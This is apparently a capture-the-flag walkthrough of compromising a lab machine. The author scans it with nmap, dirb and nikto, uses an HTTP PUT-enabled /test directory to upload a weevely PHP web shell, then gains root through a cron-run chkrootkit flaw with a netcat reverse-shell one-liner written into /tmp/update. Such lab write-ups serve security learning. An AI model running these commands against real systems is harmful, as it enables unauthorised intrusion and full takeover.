We setup the host and then start scanning it using nmap :
nmap –A –T4 –p- 192.168.1.20 –vv
Only two ports are open 22,80
Lets start scanning with dirb for directory listing and nikto for more iinformation:
Dirb and nikto showing a /test directory … so i used curl options the page came with a result ( i used curl on the main page but nothing came up) .. but now we can see that the page came with PUT options wich means we can upload a shell script to gain access
upload a malicious file using weevely ( weevely is great and i use it alot )
weevely generate 123456 shell.php
nmap -p 80 192.168.1.20 –script http-put –script-args http-put.url=’/test/shell.php’,http-put.file=’/root/ shell.php’
Running weevely with weevely http://192.168.1.20/test/shell.php
and we got a shell
I spent some time with privilege escalation till I found a crontab job using the ls -al /etc/cron* command and then I noticed a file (chkrootkit)
This file chkrootkit is a vulnerability to privilege escalation
the exploit-db post about this privilege escalation exploit, “If an attacker knows you are periodically running chkrootkit (like in cron.daily) and has write access to /tmp (not mounted noexec), he may easily take advantage of this.”
We need to write the following as described in the exploit file to gain root privilege : ( tried a lot of scripts but this one worked for me )
echo ‘#!/bin/bash’ > update
echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.2 443 >/tmp/f’ >> update
chmod 777 update
And we root … viewing the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt showed us that we successfully completed the task.
